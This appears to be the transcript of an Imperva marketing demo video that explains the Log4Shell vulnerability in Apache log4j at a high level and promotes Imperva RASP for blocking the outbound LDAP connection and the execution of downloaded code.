Imperva Up2date: The Log4j Exploit and the call for Runtime Protection (RASP)
Josh Hogle, Sr Technical Marketing Engineer.
Log4j is a popular logging framework maintained by the Apache Software Foundation, which is used in almost every Java-based commercial and open-source application around the world.
In December of 2021, multiple zero-day vulnerabilities involving remote code execution were discovered in the log4j package. The primary vulnerability, dubbed Log4Shell, allows a hacker to place a specially crafted LDAP or JNDI string in an HTTP header or request, which when logged using the log4j package, can trigger a request to download malicious code and execute it on the target machine. Payloads can be anything from ransomware, which fully encrypts a vulnerable server, to data-stealing malware to anything in between. Because log4j is so pervasive in Java-based applications, virtually every organization is at risk.
In this demo, we have 4 servers: a simple stock ticker application that uses a vulnerable version of the log4j package, an LDAP server, and a web server - both controlled by an attacker, and finally a hacker chat server where stolen data is going to be sent once the malicious code runs on the server hosting the stock ticker application.
Imperva RASP actually has 2 places where it could break the attack chain. The first, which is what we’ll see in our demo, is when the network request is made to our malicious LDAP server. Using a positive security model, RASP can immediately block the outbound connection to an unknown or untrusted server.
Because the connection is never made, no malicious code is ever downloaded or executed on the server. Even if the connection occurred and the exploit code had been downloaded, RASP’s code execution protection would have prevented the unknown code from running at all. First and foremost, RASP requires NO signatures. While other solutions require you to use signature-based to protect from attacks like Log4Shell, RASP uses a simple configuration that can easily block these types of attacks from multiple vectors.
For more information on Imperva RASP, contact your sales team or visit us online at imperva.com. For more product videos with closed captions in Chinese, English, Japanese and Spanish, visit our Video Hub.
Thanks for watching.